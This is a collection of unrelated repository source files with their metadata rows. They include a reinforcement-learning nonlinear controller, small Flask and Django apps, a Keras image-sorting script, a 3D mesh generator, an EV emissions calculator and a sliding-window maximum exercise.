t_plot, x_plot (float, array): use for logging, plotting simulation result
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
"""
def __init__(self, system, log_dir='results'):
"""Design a controller for the system
Args:
system (nonLin class): Call this class after system.setSimulationParams()
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
"""
self.system = system
self.dot_x = self.system.dot_x
self.log_dir = log_dir
self.logX = Logger(log_dir=self.log_dir)
def setPolicyParam(self, q_func=None, R=None, phi_func=None, psi_func=None, u0=lambda x: 0, data_eval=0.1, num_data=10, explore_noise=lambda t: 2*np.sin(100*t)):
"""Setup policy parameters for both the On (Off) policy algorithms. Initalize logger for K, P matrix
Args:
q_func (func(x), optional): the function :math:`q(x)`. Defaults to nonLinController.default_q_func
R (mxm array, optional): The R matrix. Defaults to 1.
phi_func (list of func(x), optional): the sequences of basis function to approximate critic, :math:`\phi_j(x)`. Defaults to nonLinController.default_phi_func
psi_func (list of func(x), optional): the sequences of basis function to approximate actor, :math:`\psi_j(x)`. Defaults to nonLinController.default_psi_func
u0 (func(x), optional): The initial feedback control policy. Defaults to 0.
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
Note:
- u0 must be admissible controller
- the squences of basis functions :math:`\phi_j(x), \psi_j(x)` should be in the form of *linearly independent smooth*
- data_eval must be larger than the sample_time
- num_data >= n(n+1) + 2mn
"""
if q_func==None:
self.q_func = NonLinController.default_q_func
else: self.q_func = q_func # positive definite function
if R==None:
self.R = np.eye(self.system.dimension[1])
else: self.R = R # symmetric and positive definite matix (1x(mxm))
if phi_func==None:
self.phi_func = NonLinController.default_phi_func
else: self.phi_func = phi_func # basis function for value function
if psi_func==None:
self.psi_func = NonLinController.default_psi_func
else: self.psi_func = psi_func # basis function for policy function
self.u0 = u0
self.data_eval = data_eval
self.num_data = num_data
self.explore_noise = explore_noise
self.logWa = Logger(self.log_dir)
self.logWc = Logger(self.log_dir)
def step(self, dot_x, x0, t_span):
"""Step respond of the no-input system
Args:
dot_x (func(x)): no-input ODEs function
x0 (1D array): the initial state
t_span (tuple): (t_start, t_stop)
Returns:
list, 2D array: t_span, state at t_span (x_start, x_stop)
"""
result = integrate.solve_ivp(fun=dot_x, t_span=t_span, y0=x0, method=self.system.algo, max_step=self.system.max_step, dense_output=True)
return result.t, result.y.T
def feedback(self, viz=True):
"""Check stability of the initial control policy u0
Args:
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
Returns:
list, 2D array: t_plot and x_plot
"""
self.viz = viz
x_plot = [self.system.x0]
t_plot = [self.system.t_sim[0]]
self.t_plot_unlearn, self.x_plot_unlearn = self._unlearn_controller(t_plot.copy(), x_plot.copy(), 'states_unlearned')
return
def offPolicy(self, stop_thres=1e-3, max_iter=30, viz=True):
"""Using Off-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
unlearned_compare (boolean): True to log unlearned states data, for comparision purpose.
max_iter (int, optional): the maximum number of policy iterations. Defaults to 30.
Returns:
array, array: the final updated weight of critic, actor neural nets.
"""
self.viz = viz
self.stop_thres = stop_thres
self.max_iter = max_iter
# collect data
u = lambda t,x: self.u0(x) + self.explore_noise(t)
dot_x = lambda t,x: self.dot_x(t, x, u(t,x))
x_plot = [self.system.x0]
t_plot = [self.system.t_sim[0]]
dphi = []
Iq = []
Iupsi = []
Ipsipsi = []
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
t_collect = t_plot[-1]
while t_plot[-1] < t_collect + self.data_eval:
t_span = (t_plot[-1], t_plot[-1] + self.system.sample_time)
t_temp, x_temp = self.step(dot_x, x_plot[-1], t_span)
if self.viz:
self.logX.log('states_offPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
t_sample.append(t_temp[-1])
x_sample.append(x_temp[-1])
x_plot.extend(x_temp[1:].tolist()),
t_plot.extend(t_temp[1:].tolist())
dphi_, Iq_, Iupsi_, Ipsipsi_ = self._getRowOffPolicyMatrix(np.array(t_sample), np.array(x_sample))
dphi.append(dphi_)
Iq.append(Iq_)
Iupsi.append(Iupsi_)
Ipsipsi.append(Ipsipsi_)
# solve policy
save_Wc, save_Wa = self._policyEval(np.array(dphi), np.array(Iq), np.array(Iupsi), np.array(Ipsipsi))
Waopt = save_Wa[-1]
self.t_plot, self.x_plot = self._afterGainWopt(t_plot.copy(), x_plot.copy(), Waopt, 'states_offPolicy')
return save_Wc[-1], save_Wa[-1]
def _unlearn_controller(self, t_plot, x_plot, section):
u = lambda t,x: self.u0(x)
dot_x = lambda t,x: self.dot_x(t,x,u(t,x))
sample_time = self.system.sample_time
start = t_plot[-1]
stop = self.system.t_sim[1]
N = int((stop - start)/sample_time)
for i in range(N):
t_temp, x_temp = self.step(dot_x, x_plot[-1], (t_plot[-1], t_plot[-1]+sample_time))
if self.viz:
self.logX.log(section, x_temp[-1], int(t_temp[-1]/self.system.sample_time))
t_plot.extend(t_temp[1:].tolist())
x_plot.extend(x_temp[1:].tolist())
return np.array(t_plot), np.array(x_plot)
def _afterGainWopt(self, t_plot, x_plot, Waopt, section):
u = lambda t,x: Waopt.dot(self.psi_func(x))
dot_x = lambda t,x: self.dot_x(t, x, u(t,x))
sample_time = self.system.sample_time
start = t_plot[-1]
stop = self.system.t_sim[1]
N = int((stop - start)/sample_time)
for i in range(N):
t_temp, x_temp = self.step(dot_x, x_plot[-1], (t_plot[-1], t_plot[-1]+sample_time))
if self.viz:
self.logX.log(section, x_temp[-1], int(t_temp[-1]/self.system.sample_time))
t_plot.extend(t_temp[1:].tolist())
x_plot.extend(x_temp[1:].tolist())
return np.array(t_plot), np.array(x_plot)
def _policyEval(self, dphi, Iq, Iupsi, Ipsipsi):
n_psi = len(self.psi_func(self.system.x0))
n_phi = len(self.phi_func(self.system.x0))
n_input = self.system.dimension[1]
Wa = np.zeros((n_input, n_psi))
save_Wc = []
save_Wa = [Wa]
for i in range(self.max_iter):
temp = -2*(Iupsi - Ipsipsi.dot(np.kron(Wa.T, np.eye(n_psi))))
A = np.hstack((dphi, temp))
B = Iq + Ipsipsi.dot(Wa.T.dot(self.R.dot(Wa)).flatten())
Wca = np.linalg.pinv(A).dot(B)
Wc = -Wca[:n_phi] # because u = Wa*psi not = -Wa*psi
if self.viz:
self.logWc.log('offPolicy_Wc', Wc, i)
self.logWa.log('offPolicy_Wa', Wa, i)
try:
err = np.linalg.norm(save_Wc[-1] - save_Wc[-2], ord=2)
if err < self.stop_thres:
break
except: pass
Wa = Wca[n_phi:].reshape((n_input, n_psi)).T.dot(np.linalg.inv(self.R)).T
save_Wc.append(Wc)
save_Wa.append(Wa)
return save_Wc, save_Wa
def _getRowOffPolicyMatrix(self, t_sample, x_sample):
dphi_ = self.phi_func(x_sample[-1]) - self.phi_func(x_sample[0])
Iq_ = []
Iupsi_ = []
Ipsipsi_ = []
u = lambda t,x: self.u0(x) + self.explore_noise(t)
for i, xi in enumerate(x_sample):
Iq_.append(self.q_func(xi))
Iupsi_.append(np.kron(u(t_sample[i], xi), self.psi_func(xi)))
Ipsipsi_.append(np.kron(self.psi_func(xi), self.psi_func(xi)))
Iq_ = integrate.simpson(Iq_, t_sample, axis=0)
Iupsi_ = integrate.simpson(Iupsi_, t_sample, axis=0)
Ipsipsi_ = integrate.simpson(Ipsipsi_, t_sample, axis=0)
return dphi_, Iq_, Iupsi_, Ipsipsi_
@staticmethod
def default_psi_func(x):
"""The default sequences of basis functions to approximate actor
Args:
x (1xn array): the state vector
Returns:
list func(x): the polynomial basis function. If :math:`x=[x_1,x_2]^T` then :math:`\psi(x) = [x_1, x_2, x_1^3, x_1^2x_2, x_1x_2^2, x_2^3]^T`
"""
psi = []
for i in range(len(x)):
psi.append(x[i])
for j in range(i, len(x)):
for k in range(j, len(x)):
psi.append(x[i]*x[j]*x[k])
return np.array(psi)
@staticmethod
def default_phi_func(x):
"""The default sequences of basis functions to approximate critic
Args:
x (1xn array): the state vector
Returns:
list func(x): the polynomial basis function. If :math:`x=[x_1,x_2]^T` then :math:`\phi(x) = [x_1^2, x_1x_2, x_2^2, x_1^4, x_1^2x_2^2, x_2^4]^T`
"""
phi = []
for i in range(len(x)):
for j in range(i, len(x)):
phi.append(x[i]*x[j])
phi.append(x[i]**2*x[j]**2)
return np.array(phi)
@staticmethod
def default_q_func(x):
"""The default function of the q(x) function
Args:
x (1D array): the state vector
Returns:
float: :math:`x^Tx`
"""
return np.sum(x*x, axis=0)
| [
"phi9b2@gmail.com"
] | phi9b2@gmail.com |
64b4de116e876e8f8baee0b128e9758022e58b5c | ba1c0a7a17cce2a3c1bd04c8a1546f74eb8007c1 | /app2.py | 92a2f10681ff2f7043927d30f66226e91ee22407 | [] | no_license | syedhaziq/ML-and-Docker | 5dd04dacff493251d9a9bd09720a2ae83746d1ba | 05346554333f72258f173635a5aafb264e08e30a | refs/heads/main | 2023-02-01T08:43:10.198863 | 2020-12-20T10:26:28 | 2020-12-20T10:26:28 | 323,042,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,407 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 18:54:00 2020
@author: syed_
"""
from flask import Flask, request
import numpy as np
import pandas as pd
import pickle
import flasgger
from flasgger import Swagger
app= Flask(__name__)
Swagger(app)
pickle_in = open("classifier.pkl","rb")
classifier=pickle.load(pickle_in)
@app.route('/')
def welcome():
return "Welcome All"
@app.route('/predict',methods=["Get"])
def predict_note_authentication():
"""Let's Authenticate the Banks Note
This is using docstrings for specifications.
---
parameters:
- name: variance
in: query
type: number
required: true
- name: skewness
in: query
type: number
required: true
- name: curtosis
in: query
type: number
required: true
- name: entropy
in: query
type: number
required: true
responses:
200:
description: The output values
"""
variance=request.args.get("variance")
skewness=request.args.get("skewness")
curtosis=request.args.get("curtosis")
entropy=request.args.get("entropy")
prediction=classifier.predict([[variance,skewness,curtosis,entropy]])
print(prediction)
return "Hello The answer is"+str(prediction)
app.run(debug=True)
| [
"noreply@github.com"
] | syedhaziq.noreply@github.com |
11883620c854fbaff19053d4596bac78d2611631 | 2f85a88c5862a4998a1b80262c4184d3c2dc1a7c | /userauthprac/manage.py | 0f112fe6e1c7da16c32381e605b07ec01807996d | [] | no_license | Tareq69/Django-Practice | 7fe21584dfe93fd548099564062cc7eec71174da | e042b80f212e332761c91078cb90e90aa2d575b1 | refs/heads/main | 2023-06-28T14:46:04.746749 | 2021-08-05T07:16:47 | 2021-08-05T07:16:47 | 365,340,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'userauthprac.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"mtareq880@gmail.com"
] | mtareq880@gmail.com |
14bca9642d96aeb5c316144e0cbd896b89f4215a | 3c66d322842f1b39edce07f54f6a9d54a7609e05 | /pic_predict.py | fe1627c800a301628ff7c681ef3057a5e9a16071 | [] | no_license | fdelia/YoN-game | 9b81cd66ee3ff01ef3d6a3de9a0cd6b7e7b503ad | ec428e929a71bd52a94d163f3017106ad4682736 | refs/heads/master | 2019-07-11T19:42:09.832983 | 2017-05-21T15:00:21 | 2017-05-21T15:00:21 | 91,965,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
from keras.models import load_model
import cv2
import numpy as np
new_data_dir = 'Pictures/new/'
predicted_data_dir = 'Pictures/predicted/'
MOVE = True
img_width, img_height = 200, 200
model = load_model('model.h5')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
def predict_image(name):
img = cv2.imread(new_data_dir + name)
if img is None: return False
img = cv2.resize(img,(img_width, img_height))
img = np.reshape(img,[1, img_width, img_height, 3])
return model.predict(img)[0][0]
# for every image in /new
files = [f for f in os.listdir(new_data_dir) if os.path.isfile(os.path.join(new_data_dir, f))]
for f in files:
if f[0] == '.': continue
prediction = predict_image(f)
if prediction < 0.5:
print f + ' --> no'
if MOVE: os.rename(os.path.join(new_data_dir, f), os.path.join(predicted_data_dir + 'no/', f))
else:
print f + ' --> yes'
if MOVE: os.rename(os.path.join(new_data_dir, f), os.path.join(predicted_data_dir + 'yes/', f))
# if class = 0 -> /no, else /yes
| [
"fabio_d@gmx.net"
] | fabio_d@gmx.net |
6ccd00459fa87e1a94f5758411d0bbdb9aec6367 | a884039e1a8b0ab516b80c2186e0e3bad28d5147 | /Livros/Livro-Desenvolvimento web com Flask/Capitulo04/Nível 01/exemplo4_3.py | a387fdd0382fcffe143985b37b25f2d588a471a9 | [
"MIT"
] | permissive | ramonvaleriano/python- | 6e744e8bcd58d07f05cd31d42a5092e58091e9f0 | ada70918e945e8f2d3b59555e9ccc35cf0178dbd | refs/heads/main | 2023-04-10T14:04:24.497256 | 2021-04-22T18:49:11 | 2021-04-22T18:49:11 | 340,360,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | py | # Program: exemplo4_3.py
# Author: Ramon R. Valeriano
# Description: Fazendos os programas do Capítulo 04, do nível 01
# Developed: 09/03/2020 - 14:48
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
app.config['SECRET_KEY'] = 'testandoaplicacao'
bootstrap = Bootstrap(app)
moment = Moment(app)
class NameForm(FlaskForm):
name = StringField('Qual é seu nome?', validators=[DataRequired()])
submit = SubmitField('Submeter')
@app.route('/', methods=['GET', 'POST'])
def index():
name = None
form = NameForm()
if form.validate_on_submit():
name = form.name.data
form.name.data = ''
return render_template('indexInicial1.html', form=form, name=name)
@app.route('/user/<name>')
def user(name):
return render_template('userInicial.html', name=name)
@app.errorhandler(404)
def pagina_nao_encontrada(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def erro_servidor(e):
return render_template('500.html'), 500
app.run(debug=True) | [
"rrvaleriano@gmail.com"
] | rrvaleriano@gmail.com |
6230ddcb42088e0000d651b5223cc77582889a0f | 53debe9ffc8902390f1f6e223f6271429717065c | /myfirstwebsite/urls.py | d2bf60f2c90e2f4970ced134c6d23df4023e6f63 | [] | no_license | prakashme333/portfoliofinal | c5a9cc78d6404172f5531c630ab8074c5574a802 | a5bd32b33e9ce8e183d9cdccd202fcd8ffe45aca | refs/heads/master | 2023-06-04T07:28:33.368734 | 2021-06-14T15:03:58 | 2021-06-14T15:03:58 | 376,794,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 969 | py | """myfirstwebsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from portfolio import views
from blog import views as blogview
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.homepage,name="homepage"),
path('blog/', blogview.forblog, name="blog"),
path('<int:id>/',blogview.detail, name="detail")
]
| [
"prakash.me333@gmail.com"
] | prakash.me333@gmail.com |
e0b621639cfd7dcfd8faffc877ce2854923c217a | 3e58aa3b1728dac3ca1f524ad412581216cb8ac4 | /EVFutureEmissionCalculator.py | 60628997545abcba032e7be4681f22621ac02dfb | [] | no_license | ascourtas/EV-cobenefit-calculator | 5cad38da5c0a54a55a46afecce320bde359fef25 | 6cef30fc7f199675190fdbc34c9f65f004d3643f | refs/heads/main | 2023-01-10T11:55:49.691314 | 2020-11-11T02:09:56 | 2020-11-11T02:09:56 | 311,831,205 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,834 | py | import xlrd #allows for reading from excel
import matplotlib.pyplot as plt #allows for creating figures within python
import numpy as np #allows for higher level math functions
import seaborn as sns #makes figures more organized
sns.set() #apply seaborn basics
# TODO: remove all absolute paths
AZNM = xlrd.open_workbook('/projects/b1045/EVTool/AZNM.xlsx') #files with future data for each type of power generation by egrid
CAMX = xlrd.open_workbook('/projects/b1045/EVTool/CAMX.xlsx')
ERCT = xlrd.open_workbook('/projects/b1045/EVTool/ERCT.xlsx')
FRCC = xlrd.open_workbook('/projects/b1045/EVTool/FRCC.xlsx')
MROE = xlrd.open_workbook('/projects/b1045/EVTool/MROE.xlsx')
MROW = xlrd.open_workbook('/projects/b1045/EVTool/MROW.xlsx')
NEWE = xlrd.open_workbook('/projects/b1045/EVTool/NEWE.xlsx')
NWPP = xlrd.open_workbook('/projects/b1045/EVTool/NWPP.xlsx')
NYCW = xlrd.open_workbook('/projects/b1045/EVTool/NYCW.xlsx')
NYLI = xlrd.open_workbook('/projects/b1045/EVTool/NYLI.xlsx')
SRVC = xlrd.open_workbook('/projects/b1045/EVTool/SRVC.xlsx')
NYUP = xlrd.open_workbook('/projects/b1045/EVTool/NYUP.xlsx')
RFCE = xlrd.open_workbook('/projects/b1045/EVTool/RFCE.xlsx')
RFCM = xlrd.open_workbook('/projects/b1045/EVTool/RFCM.xlsx')
RFCW = xlrd.open_workbook('/projects/b1045/EVTool/RFCW.xlsx')
RMPA = xlrd.open_workbook('/projects/b1045/EVTool/RMPA.xlsx')
SPNO = xlrd.open_workbook('/projects/b1045/EVTool/SPNO.xlsx')
SPSO = xlrd.open_workbook('/projects/b1045/EVTool/SPSO.xlsx')
SRMV = xlrd.open_workbook('/projects/b1045/EVTool/SRMV.xlsx')
SRMW = xlrd.open_workbook('/projects/b1045/EVTool/SRMW.xlsx')
SRSO = xlrd.open_workbook('/projects/b1045/EVTool/SRSO.xlsx')
SRTV = xlrd.open_workbook('/projects/b1045/EVTool/SRTV.xlsx')
enter = input('what is your zip code? ') #prompts with these questions for inputs to be used in calculations
startyear = input('what year do you plan on starting to own the vehicle? ')
endyear = input('when do you plan to stop owning the vehicle? ')
global startEnter
global endEnter
def getgrid(): #defines function
vList = [] #opens list to be appended to later
zipGrids = xlrd.open_workbook('/projects/b1045/EVTool/zipGrid.xlsx') #defines variable for a file with all zip codes and grids
sheet = zipGrids.sheet_by_index(4) #chooses the propper sheet within the excel file with the data we want
for row_num in range(sheet.nrows): #for a particular row in the set of all zip codes in the continental us
row_value = sheet.row_values(row_num) #narrows search down to row by row
if row_value[1] == int(enter): #if the value of the first column in a given row is equal to zip code input
global eGRID
eGRID = row_value[3] #variable eGRID is set for the third column value in that row
energyCalc = xlrd.open_workbook('/projects/b1045/EVTool/energyCalculations.xlsx') #defines variable for file with total co2
#and kWh in every grid
carbonDioxCalc = energyCalc.sheet_by_index(0) #chooses correct sheet within excel file
global COTotal
for row_num2 in range(carbonDioxCalc.nrows): #for a particular row in the energy calc excel sheet
row_value2 = carbonDioxCalc.row_values(row_num2) #narrows down to particular rows again
if row_value2[1] == eGRID: #if the value of the first column equals the grid from the zipGrids file
global COtotal
COtotal = row_value2[4] #total CO2 of this grid is the 5th column
global kwhtotal
kwhtotal=row_value2[5] #total kWh of this grid is the 6th column
timeSheet = xlrd.open_workbook('/projects/b1045/EVTool/'+eGRID+'.xlsx') #open the excel file that corresponds to the correct grid
sheetTwo = timeSheet.sheet_by_index(0) #chooses correct sheet in the eGRID excel file
theirStart = 2018 #these variables set the extremes of the years possible for our function to consider
theirEnd = 2051
while True: #sets the boundaries of the calculation
for startRow in range(sheetTwo.nrows):
startDateRow = sheetTwo.row_values(startRow) #
if startDateRow[1] == theirStart:
yearFuture = sheetTwo.row_values(rowx=-theirStart + 2052)
global COpercentage
COpercentage = ((startDateRow[2] * 95.6191) + (startDateRow[4] * 53.06) + (startDateRow[3] * 74.57193) + (.1126 * startDateRow[5] * 52.04))/((yearFuture[2] * 95.6191) + (yearFuture[4] * 53.06) + (yearFuture[3] * 74.57193) + (.1126 * yearFuture[5] * 52.04))
kwhpercentage = startDateRow[6]/yearFuture[6]
COtotal = COtotal * COpercentage
kwhtotal = kwhtotal * kwhpercentage
factor = COtotal/kwhtotal
kmyear = (18724.27 * 0.995 ** (theirStart-2019))
vList.append(factor*kmyear*0.1988*2.205)
theirStart += 1
if theirStart >= theirEnd:
break
return vList
valueList = getgrid()
finalelectric = np.sum(valueList[int(startyear)-2017:int(endyear)-2017])
finalhybrid = 6258 * (int(endyear)-int(startyear))
finalicev = 11435 * (int(endyear)-int(startyear))
finalplugin = ((finalelectric*.55*1.146875)+(.45*.6412*finalicev))
x_pos = ['Electric Vehicle', 'Hybrid Plug-in', 'Hybrid Gasoline', 'Gasoline Vehicle']
y_value = [finalelectric, finalplugin, finalhybrid, finalicev]
plt.bar(x_pos, y_value, color=(0, 0.38, 0.11, 1))
plt.xlabel("Car Type")
plt.ylabel("lbs of CO2 Equivalent")
plt.title("Total CO2 Emissions by Car Type in eGrid: " + eGRID)
plt.xticks(x_pos, x_pos)
plt.show()
print('the total amount of CO2 emissions from an electric car is '+str(finalelectric)+' pounds')
average = finalelectric/(int(endyear)-int(startyear))
print('The average per year is: '+str(average))
| [
"ascourtas@gmail.com"
] | ascourtas@gmail.com |
fddec0380f79ff6f5f668034a225ffab068a77d0 | 904fc202ae30942c561767369ea0783ec7fb20c7 | /challenge18.py | 6e72200b236c23f081f2b1c2d15b6dbf6a53ab83 | [] | no_license | TetianaHrunyk/DailyCodingProblems | 92004878f5857c6ced79825abfcff0e2bdef45f7 | c2a97ffd700db18ba4e5383fc3f0c8abbff79140 | refs/heads/master | 2021-04-01T15:45:55.030351 | 2020-08-15T17:20:56 | 2020-08-15T17:20:56 | 248,197,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,158 | py | """
Given an array of integers and a number k, where 1 <= k <= length
of the array, compute the maximum values of each subarray of length k.
For example, given array = [10, 5, 2, 7, 8, 7] and k = 3,
we should get: [10, 7, 8, 8], since:
10 = max(10, 5, 2)
7 = max(5, 2, 7)
8 = max(2, 7, 8)
8 = max(7, 8, 7)
Do this in O(n) time and O(k) space.
You can modify the input array in-place and you do not need to store
the results. You can simply print them out as you compute them.
"""
def LocalMax(a: list, k: int) -> list:
assert k > 0
max_vals = []
for i in range(len(a)):
sub_arr = a[i:i+k]
#print("Sub arr: ",sub_arr)
if len(sub_arr) < k:
break
max_vals.append(max(sub_arr))
#print("Max: ", max_vals)
return max_vals
if __name__ == '__main__':
assert LocalMax([10, 5, 2, 7, 8, 7], 3) == [10, 7, 8, 8]
assert LocalMax([10, 5, 2, 7, 8, 7], 1) == [10, 5, 2, 7, 8, 7]
assert LocalMax([10, 5, 2, 7, 8, 7], 4) == [10, 8, 8]
assert LocalMax([10, 5, 2, 7, 8, 7], 6) == [10]
assert LocalMax([2, 2, 2, 2, 2, 2], 5) == [2, 2]
| [
"tetiana.hrunyk@gmail.com"
] | tetiana.hrunyk@gmail.com |
01d2714cb72201a6a3dcb168ef90fd6bd0a8160c | 57c3524619b41e22ad3d3b2bd312f2653a9f3e68 | /movies/app/migrations/0006_user.py | 6efc19958e70702535055373e372aa4bf0322aa4 | [] | no_license | xin17863935225/MoviesProject | 8208c9836863c07300d6ed466b0c5303ca938eb0 | f494bb6e0ae36f306f4c3ddf205eebd7646ae7f2 | refs/heads/master | 2020-04-07T16:32:41.449264 | 2018-11-21T10:50:16 | 2018-11-21T10:50:16 | 158,532,980 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-11-19 09:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0005_auto_20181118_1954'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=32, unique=True)),
('password', models.CharField(max_length=32)),
('email', models.CharField(max_length=64, unique=True)),
('sex', models.BooleanField(default=True)),
('age', models.IntegerField(default=18, max_length=3)),
('icon', models.ImageField(upload_to='upload/')),
],
options={
'db_table': 'mv_user',
},
),
]
| [
"m17863935225@163.com"
] | m17863935225@163.com |
c5b012fede4462a7d9326e5a44e1ac78b9302ac0 | ab9b0e4df4149942b35f794e42080e93a07acc75 | /RayTracer/WriteArrayOfTriangles.py | 356273439476ca217c6c2d9488c906b2e71f0a76 | [] | no_license | cortana101/RayTracer | a08ffeffec398382bc5cb92e5b0e402fd0a52356 | 240c9ac238cb99c0b442a7fe86367be7db1e663b | refs/heads/master | 2021-01-18T16:29:51.980516 | 2014-07-25T16:55:09 | 2014-07-25T16:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,800 | py | #Creates a set of 4-sided cones in a 3D array
triangleHeight = 1.0
triangleWidth = 1.0
triangleFaceFormat = "3 {0} {1} {2}\n"
numTriX = 10
numTriY = 10
numTriZ = 10
startingZ = 4.0
triSpacing = 2.0
class vertex:
x = 0.0
y = 0.0
z = 0.0
def getVertexString(self):
return "{0} {1} {2}\n".format(self.x, self.y, self.z)
class triangle:
def __init__(self, topx, topy, topz):
self.top = vertex()
self.top.x = topx
self.top.y = topy
self.top.z = topz
def getVertices(self):
vertices = [self.top]
v1,v2,v3,v4 = vertex(), vertex(), vertex(), vertex()
v1.y = self.top.y - triangleHeight
v2.y = self.top.y - triangleHeight
v3.y = self.top.y - triangleHeight
v4.y = self.top.y - triangleHeight
v1.x = self.top.x - triangleWidth / 2
v2.x = self.top.x - triangleWidth / 2
v3.x = self.top.x + triangleWidth / 2
v4.x = self.top.x + triangleWidth / 2
v1.z = self.top.z - triangleWidth / 2
v2.z = self.top.z + triangleWidth / 2
v3.z = self.top.z + triangleWidth / 2
v4.z = self.top.z - triangleWidth / 2
vertices.append(v1)
vertices.append(v2)
vertices.append(v3)
vertices.append(v4)
return vertices
def getVertexIndiciesList(self, triangleProperties, triangleCount):
startingIndex = triangleCount * 5
faces = triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 1, startingIndex + 2)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 2, startingIndex + 3)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 3, startingIndex + 4)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 1, startingIndex + 4)
faces += triangleProperties + triangleFaceFormat.format(startingIndex + 1, startingIndex + 2, startingIndex + 3)
faces += triangleProperties + triangleFaceFormat.format(startingIndex + 1, startingIndex + 3, startingIndex + 4)
return faces
def PrintHeader(outputFile, triangleList):
outputFile.write("ply\n")
outputFile.write("format ascii 1.0\n")
#each triangle cone has 5 vertices
outputFile.write("element vertex {0}\n".format(len(triangleList) * 5))
outputFile.write("property float32 x\n")
outputFile.write("property float32 y\n")
outputFile.write("property float32 z\n")
#each triangle cone has 6 faces
outputFile.write("element triangle {0}\n".format(len(triangleList) * 6))
outputFile.write("property float32 colorR\n")
outputFile.write("property float32 colorG\n")
outputFile.write("property float32 colorB\n")
outputFile.write("property float32 gloss\n")
outputFile.write("property list uchar int vertex_indices\n")
outputFile.write("end_header\n")
triangleList = []
for x in range(numTriX):
for y in range(numTriY):
for z in range(numTriZ):
xOffset = -((numTriX * triSpacing) / 2) + x * triSpacing
yOffset = -((numTriY * triSpacing) / 2) + y * triSpacing
zOffset = startingZ + z * triSpacing
newTriangle = triangle(xOffset, yOffset, zOffset)
triangleList.append(newTriangle)
print("writing to file")
with open("arrayOfTriangles.ply", "w") as triFile:
PrintHeader(triFile, triangleList)
for tri in triangleList:
for v in tri.getVertices():
triFile.write(v.getVertexString())
for t in triangleList:
triangleProperties = "200 100 200 500.0 "
triFile.write(t.getVertexIndiciesList(triangleProperties, triangleList.index(t)))
print("finished writing, wrote {0} triangles".format(len(triangleList)))
| [
"shihdan@hotmail.com"
] | shihdan@hotmail.com |
1558ad1012e5d828b2873a237cfb23be3d1281f7 | dec9f5cc5fc4617b7a37a95d76f6e7faba7e91e8 | /crear_lista_con_ceros.py | 89939a436b5d0a994a8bf1bc66bbb068f0612f5c | [] | no_license | jfernand196/Ejercicios-Python | d9ea39e37e241a6409c1ceed373c1bf6049944de | 1cedb16d2ada8ec5b67cec485fd0fc756b92953b | refs/heads/main | 2023-09-03T13:59:34.777020 | 2021-11-06T23:03:24 | 2021-11-06T23:03:24 | 421,098,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22 | py | arr=[0]*(4)
print(arr) | [
"jfernand196@gmail.com"
] | jfernand196@gmail.com |
0cfd39321abd018e157c9924d421b20f4473af3f | 1f5b6cd825f1a8b97de5ded0ec95931dd6f635af | /example.py | 2b1595011ad71cec36aae9840c55ec755ef35759 | [] | no_license | zalavin/voronoi | 735a37ae4dd17e9f9e31ce5085ce2fa03ba410d5 | 7e030bd1d657997962adfb75fc6485a176d51b60 | refs/heads/master | 2020-11-24T09:42:42.626272 | 2019-12-15T10:01:34 | 2019-12-15T10:01:34 | 228,088,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | import numpy as np
from scipy.spatial import Voronoi, voronoi_plot_2d
import matplotlib.pyplot as plt
